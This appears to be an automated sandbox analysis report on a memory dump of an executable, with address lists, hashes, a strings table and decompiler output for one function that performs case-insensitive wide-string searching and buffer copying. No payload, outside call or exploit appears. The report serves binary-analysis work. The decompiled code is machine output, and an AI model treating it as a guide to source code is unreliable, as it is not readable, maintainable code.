0x0041bb26
0x0041bb2a
0x0041bb2a
0x0041bb35
0x0041bb39
0x0041bb3f
0x0041bb42
0x0041bb48
0x0041bb4e
0x0041bb51
0x0041bb54
0x00000000
0x00000000
0x0041bb60
0x0041bb62
0x0041bb6b
0x0041bb6b
0x0041bb6e
0x0041bb72
0x0041bb76
0x0041bb7a
0x0041bb7e
0x0041bb7e
0x0041bb80
0x00000000
0x00000000
0x0041bb86
0x0041bb88
0x0041bbae
0x0041bbba
0x0041bbba
0x0041bbc0
0x0041bbc0
0x0041bbc5
0x0041bbc9
0x0041bbcd
0x0041bbcf
0x00000000
0x00000000
0x0041bbd5
0x0041bbd8
0x0041bbda
0x00000000
0x00000000
0x0041bbdc
0x0041bbe2
0x0041bbf5
0x0041bbf5
0x0041bbfa
0x0041bbfc
0x0041bbfc
0x0041bbff
0x0041bc1f
0x0041bc2b
0x0041bc2b
0x0041bc31
0x0041bc31
0x0041bc36
0x0041bc3a
0x0041bc3e
0x0041bc40
0x00000000
0x00000000
0x0041bc46
0x0041bc49
0x0041bc4b
0x00000000
0x00000000
0x0041bc4d
0x0041bc53
0x0041bc66
0x0041bc66
0x0041bc6b
0x0041bc6f
0x0041bc73
0x0041bc75
0x0041bc78
0x0041bc7a
0x0041bc7d
0x0041bc7f
0x0041bc82
0x0041bc85
0x0041bc87
0x0041bc8a
0x0041bc8c
0x0041bde2
0x0041bde2
0x0041bdec
0x0041bdee
0x0041bdf4
0x0041bdf6
0x0041bdf8
0x0041be37
0x00000000
0x0041be37
0x0041bdfa
0x0041bdfc
0x0041be25
0x0041be25
0x0041be27
0x0041be28
0x0041be2d
0x00000000
0x0041be2d
0x0041bdfe
0x0041be01
0x0041be04
0x0041be06
0x00000000
0x00000000
0x0041be08
0x0041be08
0x0041be0a
0x0041be0a
0x0041be0b
0x0041be10
0x0041be15
0x0041be17
0x00000000
0x00000000
0x0041be19
0x0041be1d
0x0041be21
0x0041be23
0x00000000
0x00000000
0x00000000
0x0041be23
0x00000000
0x0041be0a
0x0041bc92
0x0041bc95
0x0041bc97
0x00000000
0x00000000
0x0041bc9d
0x0041bc9f
0x0041bd0f
0x0041bd14
0x0041bd14
0x0041bd17
0x0041bd1a
0x0041bd1d
0x0041bd1f
0x0041bd32
0x0041bd35
0x0041bd35
0x0041bd3b
0x0041bd43
0x0041bd43
0x0041bd43
0x0041bd44
0x0041bd4e
0x0041bd58
0x0041bd5b
0x0041bd61
0x0041bd63
0x0041bd69
0x0041bd6b
0x0041bd6d
0x0041bda7
0x0041bda9
0x00000000
0x0041bd6f
0x0041bd6f
0x0041bd71
0x0041bd9a
0x0041bd9a
0x0041bd9c
0x0041bd9d
0x0041bda2
0x0041bdac
0x0041bdac
0x0041bdb2
0x0041bdb5
0x0041bdb7
0x0041bdb7
0x0041bdb9
0x00000000
0x00000000
0x0041bdbf
0x0041bdc9
0x0041bdc9
0x0041bdcc
0x0041bdcd
0x0041bdd0
0x0041bdd2
0x00000000
0x00000000
0x0041bdd4
0x0041bdd6
0x0041be4a
0x00000000
0x0041be4a
0x0041bdd8
0x0041bdd8
0x0041bdda
0x00000000
0x00000000
0x0041bdc3
0x0041bdc6
0x0041bdc6
0x0041bdc6
0x0041bdc9
0x0041bd73
0x0041bd76
0x0041bd79
0x0041bd7b
0x00000000
0x00000000
0x0041bd7d
0x0041bd7d
0x0041bd7f
0x0041bd7f
0x0041bd80
0x0041bd85
0x0041bd8a
0x0041bd8c
0x00000000
0x00000000
0x0041bd8e
0x0041bd92
0x0041bd96
0x0041bd98
0x00000000
0x00000000
0x00000000
0x0041bd98
0x00000000
0x0041bd7f
0x0041bd6d
0x0041bd21
0x00000000
0x0041bd21
0x0041bca3
0x0041bca3
0x0041bca6
0x0041bcc3
0x0041bccf
0x0041bccf
0x0041bcd5
0x0041bcd5
0x0041bcda
0x0041bcde
0x0041bce2
0x0041bce4
0x00000000
0x00000000
0x0041bcea
0x0041bced
0x0041bcef
0x00000000
0x00000000
0x0041bcf1
0x0041bcf7
0x0041bd0a
0x0041bd0a
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bcf9
0x0041bcf9
0x0041bcfd
0x0041bcff
0x00000000
0x00000000
0x0041bd01
0x0041bd02
0x0041bd08
0x00000000
0x00000000
0x00000000
0x0041bd08
0x00000000
0x0041bcf9
0x0041be7a
0x0041be7f
0x00000000
0x0041be7f
0x0041bca8
0x0041bcaa
0x0041bcad
0x00000000
0x00000000
0x0041bcb4
0x0041bcb4
0x0041bcb6
0x0041bcb6
0x0041bcba
0x0041bcbc
0x00000000
0x00000000
0x0041bcbe
0x0041bcbf
0x0041bcc1
0x00000000
0x00000000
0x00000000
0x0041bcc1
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bc55
0x0041bc55
0x0041bc59
0x0041bc5b
0x00000000
0x00000000
0x0041bc5d
0x0041bc5e
0x0041bc64
0x00000000
0x00000000
0x00000000
0x0041bc64
0x00000000
0x0041bc55
0x0041be86
0x0041be8b
0x00000000
0x0041be8b
0x0041bc01
0x0041bc03
0x0041bc09
0x00000000
0x00000000
0x0041bc10
0x0041bc10
0x0041bc12
0x0041bc12
0x0041bc16
0x0041bc18
0x00000000
0x00000000
0x0041bc1a
0x0041bc1b
0x0041bc1d
0x00000000
0x00000000
0x00000000
0x0041bc1d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bbe4
0x0041bbe4
0x0041bbe8
0x0041bbea
0x00000000
0x00000000
0x0041bbec
0x0041bbed
0x0041bbf3
0x00000000
0x00000000
0x00000000
0x0041bbf3
0x00000000
0x0041bbe4
0x0041be92
0x0041be97
0x00000000
0x0041be97
0x0041bb8a
0x0041bb8c
0x0041bb91
0x00000000
0x00000000
0x0041bb93
0x0041bb97
0x0041bb99
0x0041bb9d
0x0041bb9f
0x00000000
0x00000000
0x0041bba5
0x0041bba6
0x0041bba8
0x00000000
0x00000000
0x0041bbaa
0x00000000
0x0041bbaa
0x0041be3f
0x00000000
0x0041be3f
0x0041bb64
0x0041bb65
0x0041bb69
0x00000000
0x00000000
0x00000000
0x0041bb69
0x0041be9e
0x0041bea1
0x0041bea5
0x0041beab
0x0041beab
0x0041beae
0x00000000
0x00000000
0x0041beb8
0x0041beba
0x00000000
0x00000000
0x0041bec0
0x0041bec3
0x0041bec3
0x0041bec5
0x0041bec9
0x0041becd
0x0041bed1
0x0041bed1
0x0041bedb
0x0041bede
0x0041bee4
0x0041beee
0x0041bef1
0x0041bef4
0x00000000
0x00000000
0x0041befe
0x0041bf00
0x00000000
0x00000000
0x00000000
0x0041bf02
0x0041ba62
0x0041ba65
0x0041ba69
0x00000000
0x0041ba69
0x0041bf07
0x0041bf0b
0x0041be5f
0x0041be5f
0x0041be61
0x00000000
0x00000000
0x0041be67
0x00000000
0x00000000
0x0041be6d
0x0041be71
0x00000000
0x0041be71
0x0041ba79
0x0041ba7d
0x0041ba7f
0x0041ba83
0x0041ba87
0x0041ba8b
0x0041ba8d
0x00000000
0x00000000
0x0041ba93
0x0041ba94
0x0041ba96
0x00000000
0x00000000
0x0041ba98
0x0041ba9c
0x0041baa0
0x00000000
0x0041baa0
0x0041be53
0x0041be57
0x0041be5b
0x00000000
0x0041baa4
0x0041bab0
0x0041bab4
0x0041bab4
0x0041bab9
0x0041babd
0x0041bac1
0x0041bac1
0x0041bac6
0x0041baca
0x0041bace
0x0041bad0
0x00000000
0x00000000
0x0041bad6
0x0041bad9
0x0041badb
0x00000000
0x00000000
0x0041badd
0x0041bae1
0x0041bae5
0x0041bae9
0x0041baee
0x00000000
0x00000000
0x00000000
0x0041baee
0x0041bf16
0x0041bf1b
0x0041bf1f
0x0041bf21
0x0041bf25
0x00000000
0x0041bf25
0x0041ba6d
0x00000000
0x0041b8d2
0x0041b861
0x0041b864
0x0041b867
0x0041b869
0x00000000
0x00000000
0x0041b86b
0x0041b86e
0x0041b86e
0x0041b870
0x0041b870
0x0041b871
0x0041b876
0x0041b87b
0x0041b87d
0x00000000
0x00000000
0x0041b87f
0x0041b883
0x0041b887
0x0041b889
0x00000000
0x00000000
0x00000000
0x0041b889
0x0041b88b
0x00000000
0x0041b88b
0x0041b85b
0x0041b811
0x00000000
0x0041b811
0x0041b783
0x0041b783
0x0041b786
0x0041b7a6
0x0041b7aa
0x0041b7b6
0x0041b7b6
0x0041b7bc
0x0041b7bc
0x0041b7c1
0x0041b7c5
0x0041b7c9
0x0041b7cb
0x00000000
0x00000000
0x0041b7d1
0x0041b7d4
0x0041b7d6
0x00000000
0x00000000
0x0041b7d8
0x0041b7de
0x0041b7f5
0x0041b7f5
0x0041b7fa
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b7e0
0x0041b7e0
0x0041b7e4
0x0041b7e6
0x00000000
0x00000000
0x0041b7ec
0x0041b7ed
0x0041b7f3
0x00000000
0x00000000
0x00000000
0x0041b7f3
0x0041ba15
0x0041ba15
0x0041ba18
0x0041ba28
0x0041ba1a
0x0041ba1c
0x0041ba1f
0x0041ba1f
0x00000000
0x0041ba18
0x0041bf2e
0x0041bf33
0x00000000
0x0041bf33
0x0041b788
0x0041b78a
0x0041b78c
0x00000000
0x00000000
0x0041b793
0x0041b793
0x0041b795
0x0041b795
0x0041b799
0x0041b79b
0x00000000
0x00000000
0x0041b7a1
0x0041b7a2
0x0041b7a4
0x00000000
0x00000000
0x00000000
0x0041b7a4
0x00000000
0x0041b795
0x0041b770
0x00000000
0x0041b770
0x0041b721
0x0041b74a
0x0041b74a
0x0041b74c
0x0041b74d
0x0041b752
0x00000000
0x0041b752
0x0041b723
0x0041b726
0x0041b72b
0x00000000
0x00000000
0x0041b72f
0x0041b72f
0x0041b730
0x0041b735
0x0041b73c
0x00000000
0x00000000
0x0041b73e
0x0041b742
0x0041b748
0x00000000
0x00000000
0x00000000
0x0041b748
0x00000000

Strings

@, xrefs: 0041B760

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 0beef277e831ee5b6f040fee2b591ecf537cd5d41fbc7949637f2daeaf3f676f
Instruction ID: 2d803d905ac33580eb2e839f42fb768fdffffc2a6ef63c0728425cd1e272840f
Opcode Fuzzy Hash: 0beef277e831ee5b6f040fee2b591ecf537cd5d41fbc7949637f2daeaf3f676f
Instruction Fuzzy Hash: 3B32E675A147128BC714CF29C4816BB72E2FFD4750F28862EE995873A4EB38D885C3D9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A660, Relevance: 1.9, Strings: 1, Instructions: 690
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0041A660(signed int __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t219;
				signed int _t220;
				signed int _t221;
				signed int _t224;
				signed short** _t227;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t237;
				signed int _t238;
				signed int _t240;
				unsigned int _t242;
				signed int _t248;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t260;
				signed int _t263;
				signed int _t264;
				unsigned int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t288;
				signed int _t293;
				signed int _t294;
				signed int _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t309;
				signed int _t312;
				unsigned int _t318;
				signed int _t319;
				signed int _t321;
				signed short* _t323;
				signed int _t324;
				signed int _t325;
				unsigned int _t326;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed short* _t344;
				signed int _t345;
				signed short* _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t356;
				signed int _t362;
				unsigned int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t369;
				signed int _t370;
				signed int _t371;
				signed int _t376;
				signed int _t378;
				signed int _t382;
				signed int _t386;
				signed int _t387;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t403;
				signed int _t404;
				signed int _t406;
				signed int _t407;
				signed int _t414;
				signed int _t415;
				signed int _t417;
				signed int _t418;
				signed int _t421;
				signed int* _t422;
				signed int _t425;
				signed int _t428;
				signed int _t432;
				signed int _t434;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t444;
				void* _t447;

				_t312 = __ecx;
				_t296 = 0;
				_v40 = 0;
				_t398 = __ecx;
				_v36 = 0;
				_push(0x80);
				_t417 = E00411030();
				_t447 = (_t444 & 0xfffffff0) - 0x34 + 4;
				_t344 = _v40;
				if(_t344 == 0) {
					 *_t417 = 0;
					L8:
					_v36 = 0x40;
					_v40 = _t417;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t417;
						if(_t417 == 0) {
							_t418 = 0x40;
							_t345 = _t296;
							L23:
							_t24 = _t345 + 2; // -2147483652
							_t219 = _t24;
							__eflags = _t219 - 0x40;
							_t220 =  <=  ? 0x40 : _t219;
							__eflags = _t418 - _t220;
							if(_t418 < _t220) {
								_t318 = (_t220 >> 5 >> 0x1a) + _t220 >> 6;
								_t221 = _t220 & 0x8000003f;
								__eflags = _t221;
								if(_t221 < 0) {
									_t221 = (_t221 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t221;
								}
								__eflags = _t221;
								_t319 = _t318 + (_t296 & 0xffffff00 | _t221 > 0x00000000);
								_v64 = _t319 << 6;
								_push(_t319 << 7);
								_v60 = _t345;
								_t224 = E00411030();
								_t345 = _v60;
								_t421 = _t224;
								_t447 = _t447 + 4;
								_t321 = _v40;
								__eflags = _t321;
								if(_t321 == 0) {
									 *_t421 = _t296;
									goto L36;
								} else {
									__eflags = _t421;
									if(_t421 == 0) {
										L34:
										_push(2);
										_push(_t321);
										_v60 = _t345;
										E004110B0();
										_t345 = _v60;
										_t447 = _t447 + 8;
										L36:
										_v36 = _v64;
										_v40 = _t421;
										L37:
										 *((short*)(_t421 + _t345 * 2)) = _a8 & 0x0000ffff;
										_t227 =  &_v40;
										 *( *_t227 + 2 + _t345 * 2) = _t296;
										L38:
										_t346 =  *_t227;
										_t422 = _a4;
										if(_t346 == 0) {
											L40:
											_push(0x80);
											 *_t422 = _t296;
											_t422[1] = _t296;
											_t399 = E00411030();
											_t447 = _t447 + 4;
											_t323 =  *_t422;
											if(_t323 == 0) {
												 *_t399 = _t296;
												L62:
												 *_t422 = _t399;
												_t422[1] = 0x40;
												L63:
												_push(2);
												_push(_v40);
												E004110B0();
												_v40 = _t296;
												_v36 = _t296;
												return _t422;
											}
											if(_t399 == 0) {
												L46:
												_push(2);
												_push(_t323);
												E004110B0();
												_t447 = _t447 + 8;
												goto L62;
											}
											_t347 =  *_t323 & 0x0000ffff;
											 *_t399 = _t347;
											if(_t347 == 0) {
												goto L46;
											}
											_t348 = _t296;
											while(1) {
												_t348 = _t348 + 1;
												_t232 =  *(_t323 + _t348 * 4 - 2) & 0x0000ffff;
												 *(_t399 + _t348 * 4 - 2) = _t232;
												if(_t232 == 0) {
													goto L46;
												}
												_t233 =  *(_t323 + _t348 * 4) & 0x0000ffff;
												 *(_t399 + _t348 * 4) = _t233;
												if(_t233 != 0) {
													continue;
												}
												goto L46;
											}
											goto L46;
										}
										_t234 =  *_t346 & 0x0000ffff;
										if(_t234 != 0) {
											_t324 =  *_t398;
											__eflags = _t324;
											if(_t324 == 0) {
												L54:
												_push(0x80);
												 *_t422 = _t296;
												_t422[1] = _t296;
												_t399 = E00411030();
												_t447 = _t447 + 4;
												_t325 =  *_t422;
												__eflags = _t325;
												if(_t325 == 0) {
													 *_t399 = _t296;
													goto L62;
												}
												__eflags = _t399;
												if(_t399 == 0) {
													L60:
													_push(2);
													_push(_t325);
													E004110B0();
													_t447 = _t447 + 8;
													goto L62;
												}
												_t349 =  *_t325 & 0x0000ffff;
												 *_t399 = _t349;
												__eflags = _t349;
												if(_t349 == 0) {
													goto L60;
												}
												_t350 = _t296;
												while(1) {
													_t350 = _t350 + 1;
													_t237 =  *(_t325 + _t350 * 4 - 2) & 0x0000ffff;
													 *(_t399 + _t350 * 4 - 2) = _t237;
													__eflags = _t237;
													if(_t237 == 0) {
														goto L60;
													}
													_t238 =  *(_t325 + _t350 * 4) & 0x0000ffff;
													 *(_t399 + _t350 * 4) = _t238;
													__eflags = _t238;
													if(_t238 != 0) {
														continue;
													}
													goto L60;
												}
												goto L60;
											}
											__eflags =  *_t324 & 0x0000ffff;
											if(( *_t324 & 0x0000ffff) == 0) {
												goto L54;
											}
											_v32 = _t346;
											__eflags = _t234 - 0x41 - 0x19;
											_t239 =  <=  ? _t234 + 0x20 : _t234;
											_t403 = _t296;
											_t240 = ( <=  ? _t234 + 0x20 : _t234) & 0x0000ffff;
											_v48 = _t240;
											while(1) {
												_t425 =  *(_t324 + _t403 * 2) & 0x0000ffff;
												__eflags = _t425 - 0x41 - 0x19;
												_t426 =  <=  ? _t425 + 0x20 : _t425;
												__eflags = ( <=  ? _t425 + 0x20 : _t425) - _t240;
												if(( <=  ? _t425 + 0x20 : _t425) == _t240) {
													break;
												}
												_t403 = _t403 + 1;
												__eflags =  *(_t324 + _t403 * 2) & 0x0000ffff;
												if(( *(_t324 + _t403 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												L53:
												_t422 = _a4;
												_t296 = 0;
												__eflags = 0;
												goto L54;
											}
											_t352 = _v32;
											_t404 = _t324 + _t403 * 2;
											_t422 = _a4;
											_t296 = 0;
											__eflags = _t404;
											if(_t404 == 0) {
												goto L54;
											}
											_t428 = _t352 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_v64 = _t428;
											_t242 = _t428 & 0x00000001;
											_v52 = _t242;
											_v56 =  ~_t428 + 0x10 >> 1;
											_v60 = _t324;
											_v32 = _t352;
											_t432 = _v64;
											_t299 = _v56;
											_t326 = _t242;
											while(1) {
												L70:
												_t353 = _t432;
												__eflags = _t432;
												if(_t432 == 0) {
													goto L76;
												}
												_t251 = 0;
												__eflags = _t326;
												if(_t326 != 0) {
													L80:
													_t333 = _v32;
													while(1) {
														__eflags =  *(_t333 + _t251 * 2) & 0x0000ffff;
														if(( *(_t333 + _t251 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t251 = _t251 + 1;
														__eflags = _t251 - 0x7fffffff;
														if(_t251 < 0x7fffffff) {
															continue;
														}
														_v32 = _t333;
														L84:
														_t251 = 0x7fffffff;
														L85:
														_v68 = _t251;
														_t354 = 0;
														__eflags = 0;
														while(1) {
															_t302 =  *(_t404 + _t354 * 2) & 0x0000ffff;
															_t434 =  *(_v32 + _t354 * 2) & 0x0000ffff;
															__eflags = _t302 - 0x61 - 0x19;
															_t303 =  <=  ? _t302 - 0x20 : _t302;
															_t253 = ( <=  ? _t302 - 0x20 : _t302) & 0x0000ffff;
															__eflags = _t434 - 0x61 - 0x19;
															_t435 =  <=  ? _t434 - 0x20 : _t434;
															__eflags = _t253 - ( <=  ? _t434 - 0x20 : _t434);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t253;
															if(_t253 == 0) {
																L90:
																_t335 = _v60;
																_t296 = 0;
																_t422 = _a4;
																__eflags = _t404;
																if(_t404 == 0) {
																	goto L54;
																}
																_t406 = _t404 - _t335;
																__eflags = _t406;
																_t407 = _t406 >> 1;
																if(_t406 != 0) {
																	_t257 = _t335 & 0x0000000f;
																	__eflags = _t257;
																	if(_t257 == 0) {
																		L106:
																		_t362 =  ~( ~_t257 + 0x00000007 & 0x00000007) + 0x7fffffff;
																		__eflags = _t362;
																		while(1) {
																			asm("movdqu xmm1, [ecx+eax*2]");
																			asm("pcmpeqw xmm1, xmm0");
																			asm("pmovmskb ebx, xmm1");
																			__eflags = _t296;
																			if(_t296 != 0) {
																				break;
																			}
																			_t257 = _t257 + 8;
																			__eflags = _t257 - _t362;
																			if(_t257 < _t362) {
																				continue;
																			}
																			_t296 = 0;
																			__eflags = _t362 - 0x7fffffff;
																			if(_t362 >= 0x7fffffff) {
																				L112:
																				_t362 = 0x7fffffff;
																				L113:
																				_t260 = _t362 >> 0x0000001f & _t362;
																				_t365 = _t362 - _t260;
																				__eflags = _t407;
																				if(_t407 < 0) {
																					L115:
																					_t407 = _t365;
																					L116:
																					 *_t422 = _t296;
																					_t336 = _t335 + _t260 * 2;
																					_t422[1] = _t296;
																					__eflags = _t336;
																					if(_t336 == 0) {
																						L151:
																						_push(0x80);
																						_t399 = E00411030();
																						_t447 = _t447 + 4;
																						_t337 =  *_t422;
																						__eflags = _t337;
																						if(_t337 == 0) {
																							 *_t399 = _t296;
																							goto L62;
																						}
																						__eflags = _t399;
																						if(_t399 == 0) {
																							L157:
																							_push(2);
																							_push(_t337);
																							E004110B0();
																							_t447 = _t447 + 8;
																							goto L62;
																						}
																						_t366 =  *_t337 & 0x0000ffff;
																						 *_t399 = _t366;
																						__eflags = _t366;
																						if(_t366 == 0) {
																							goto L157;
																						}
																						_t367 = _t296;
																						while(1) {
																							_t367 = _t367 + 1;
																							_t263 =  *(_t337 + _t367 * 4 - 2) & 0x0000ffff;
																							 *(_t399 + _t367 * 4 - 2) = _t263;
																							__eflags = _t263;
																							if(_t263 == 0) {
																								goto L157;
																							}
																							_t264 =  *(_t337 + _t367 * 4) & 0x0000ffff;
																							 *(_t399 + _t367 * 4) = _t264;
																							__eflags = _t264;
																							if(_t264 != 0) {
																								continue;
																							}
																							goto L157;
																						}
																						goto L157;
																					}
																					__eflags =  *_t336 & 0x0000ffff;
																					if(( *_t336 & 0x0000ffff) == 0) {
																						goto L151;
																					}
																					__eflags = _t407;
																					if(_t407 != 0) {
																						L131:
																						_t159 = _t407 + 1; // 0x80000000
																						_t369 = _t159;
																						__eflags = _t369 - 0x40;
																						_t370 =  <=  ? 0x40 : _t369;
																						__eflags = _t370;
																						if(_t370 > 0) {
																							_t270 = (_t370 >> 5 >> 0x1a) + _t370 >> 6;
																							_t371 = _t370 & 0x8000003f;
																							__eflags = _t371;
																							if(_t371 < 0) {
																								_t371 = (_t371 - 0x00000001 | 0xffffffc0) + 1;
																								__eflags = _t371;
																							}
																							__eflags = _t371;
																							_t271 = _t270 + (_t296 & 0xffffff00 | _t371 > 0x00000000);
																							_v64 = _t271 << 6;
																							_push(_t271 << 7);
																							_v60 = _t336;
																							_t273 = E00411030();
																							_t336 = _v60;
																							_t447 = _t447 + 4;
																							_t376 =  *_t422;
																							__eflags = _t376;
																							if(_t376 == 0) {
																								 *_t273 = _t296;
																								goto L143;
																							} else {
																								__eflags = _t273;
																								if(_t273 == 0) {
																									L141:
																									_push(2);
																									_push(_t376);
																									_v68 = _t273;
																									_v60 = _t336;
																									E004110B0();
																									_t336 = _v60;
																									_t273 = _v68;
																									_t447 = _t447 + 8;
																									L143:
																									_t422[1] = _v64;
																									 *_t422 = _t273;
																									L144:
																									__eflags = _t273;
																									if(_t273 == 0) {
																										goto L63;
																									}
																									_t378 = _t296;
																									while(1) {
																										_t309 =  *_t336 & 0x0000ffff;
																										_t378 = _t378 + 1;
																										 *_t273 = _t309;
																										__eflags = _t407;
																										if(_t407 == 0) {
																											goto L149;
																										}
																										__eflags = _t378 - _t407;
																										if(_t378 == _t407) {
																											_t296 = 0;
																											 *(_t273 + 2) = 0;
																											goto L63;
																										}
																										L149:
																										__eflags = _t309;
																										if(_t309 == 0) {
																											_t296 = 0;
																											goto L63;
																										}
																										_t273 = _t273 + 2;
																										_t336 = _t336 + 2;
																										__eflags = _t336;
																									}
																								}
																								_t438 =  *_t376 & 0x0000ffff;
																								 *_t273 = _t438;
																								__eflags = _t438;
																								_t422 = _a4;
																								if(_t438 == 0) {
																									goto L141;
																								} else {
																									goto L138;
																								}
																								while(1) {
																									L138:
																									_t296 = _t296 + 1;
																									_t439 =  *(_t376 + _t296 * 4 - 2) & 0x0000ffff;
																									 *(_t273 + _t296 * 4 - 2) = _t439;
																									__eflags = _t439;
																									if(_t439 == 0) {
																										break;
																									}
																									_t440 =  *(_t376 + _t296 * 4) & 0x0000ffff;
																									 *(_t273 + _t296 * 4) = _t440;
																									__eflags = _t440;
																									if(_t440 != 0) {
																										continue;
																									}
																									break;
																								}
																								_t422 = _a4;
																								_t296 = 0;
																								__eflags = 0;
																								goto L141;
																							}
																						}
																						_t273 = _t296;
																						goto L144;
																					}
																					_t382 = _t336 & 0x0000000f;
																					__eflags = _t382;
																					if(_t382 == 0) {
																						L124:
																						_t407 =  ~( ~_t382 + 0x00000007 & 0x00000007) + 0x7fffffff;
																						__eflags = _t407;
																						while(1) {
																							asm("movdqu xmm1, [ecx+edx*2]");
																							asm("pcmpeqw xmm1, xmm0");
																							asm("pmovmskb eax, xmm1");
																							__eflags = _t260;
																							if(_t260 != 0) {
																								break;
																							}
																							_t382 = _t382 + 8;
																							__eflags = _t382 - _t407;
																							if(_t382 < _t407) {
																								continue;
																							}
																							__eflags = _t407 - 0x7fffffff;
																							if(_t407 >= 0x7fffffff) {
																								L130:
																								_t407 = 0x7fffffff;
																								goto L131;
																							} else {
																								goto L128;
																							}
																							while(1) {
																								L128:
																								__eflags =  *(_t336 + _t407 * 2) & 0x0000ffff;
																								if(( *(_t336 + _t407 * 2) & 0x0000ffff) == 0) {
																									goto L131;
																								}
																								_t407 = _t407 + 1;
																								__eflags = _t407 - 0x7fffffff;
																								if(_t407 < 0x7fffffff) {
																									continue;
																								}
																								goto L130;
																							}
																							goto L131;
																						}
																						asm("bsf edi, eax");
																						_t407 = (_t407 >> 1) + _t382;
																						goto L131;
																					}
																					_t407 = _t296;
																					__eflags = _t382 & 0x00000001;
																					if((_t382 & 0x00000001) != 0) {
																						goto L128;
																					}
																					_t382 =  ~_t382 + 0x10 >> 1;
																					__eflags = _t382;
																					while(1) {
																						_t260 =  *(_t336 + _t407 * 2) & 0x0000ffff;
																						__eflags = _t260;
																						if(_t260 == 0) {
																							goto L131;
																						}
																						_t407 = _t407 + 1;
																						__eflags = _t407 - _t382;
																						if(_t407 < _t382) {
																							continue;
																						}
																						goto L124;
																					}
																					goto L131;
																				}
																				__eflags = _t407 - _t365;
																				if(_t407 <= _t365) {
																					goto L116;
																				}
																				goto L115;
																			} else {
																				goto L110;
																			}
																			while(1) {
																				L110:
																				__eflags =  *(_t335 + _t362 * 2) & 0x0000ffff;
																				if(( *(_t335 + _t362 * 2) & 0x0000ffff) == 0) {
																					goto L113;
																				}
																				_t362 = _t362 + 1;
																				__eflags = _t362 - 0x7fffffff;
																				if(_t362 < 0x7fffffff) {
																					continue;
																				}
																				goto L112;
																			}
																			goto L113;
																		}
																		_t363 = _t296;
																		_t296 = 0;
																		asm("bsf edx, edx");
																		_t362 = (_t363 >> 1) + _t257;
																		goto L113;
																	}
																	_t362 = 0;
																	__eflags = _t257 & 0x00000001;
																	if((_t257 & 0x00000001) != 0) {
																		goto L110;
																	}
																	_t257 =  ~_t257 + 0x10 >> 1;
																	__eflags = _t257;
																	while(1) {
																		__eflags =  *(_t335 + _t362 * 2) & 0x0000ffff;
																		if(( *(_t335 + _t362 * 2) & 0x0000ffff) == 0) {
																			break;
																		}
																		_t362 = _t362 + 1;
																		__eflags = _t362 - _t257;
																		if(_t362 < _t257) {
																			continue;
																		}
																		_t296 = 0;
																		__eflags = 0;
																		goto L106;
																	}
																	_t296 = 0;
																	goto L113;
																}
																_push(0x80);
																 *_t422 = 0;
																_t422[1] = 0;
																_t399 = E00411030();
																_t447 = _t447 + 4;
																_t338 =  *_t422;
																__eflags = _t338;
																if(_t338 == 0) {
																	 *_t399 = 0;
																	goto L62;
																}
																__eflags = _t399;
																if(_t399 == 0) {
																	L98:
																	_push(2);
																	_push(_t338);
																	E004110B0();
																	_t447 = _t447 + 8;
																	goto L62;
																}
																_t386 =  *_t338 & 0x0000ffff;
																 *_t399 = _t386;
																__eflags = _t386;
																if(_t386 == 0) {
																	goto L98;
																}
																_t387 = 0;
																while(1) {
																	_t387 = _t387 + 1;
																	_t280 =  *(_t338 + _t387 * 4 - 2) & 0x0000ffff;
																	 *(_t399 + _t387 * 4 - 2) = _t280;
																	__eflags = _t280;
																	if(_t280 == 0) {
																		goto L98;
																	}
																	_t281 =  *(_t338 + _t387 * 4) & 0x0000ffff;
																	 *(_t399 + _t387 * 4) = _t281;
																	__eflags = _t281;
																	if(_t281 != 0) {
																		continue;
																	}
																	goto L98;
																}
																goto L98;
															}
															_t354 = _t354 + 1;
															__eflags = _t354 - _v68;
															if(_t354 < _v68) {
																continue;
															}
															goto L90;
														}
														_t356 = _t404 + 2;
														__eflags = _t356;
														if(_t356 == 0) {
															goto L53;
														}
														__eflags =  *(_t404 + 2) & 0x0000ffff;
														if(( *(_t404 + 2) & 0x0000ffff) == 0) {
															goto L53;
														}
														_v44 = _t404;
														_t255 = 0;
														__eflags = 0;
														while(1) {
															_t255 = _t255 + 1;
															_t404 = _v44 + _t255 * 2;
															_t331 =  *_t404 & 0x0000ffff;
															__eflags = ( *(_t356 + _t255 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t332 =  <=  ? _t331 + 0x20 : _t331;
															__eflags = ( <=  ? _t331 + 0x20 : _t331) - _v48;
															if(( <=  ? _t331 + 0x20 : _t331) == _v48) {
																break;
															}
															__eflags =  *(_t356 + _t255 * 2) & 0x0000ffff;
															if(( *(_t356 + _t255 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L53;
														}
														_t432 = _v64;
														_t299 = _v56;
														_t326 = _v52;
														goto L70;
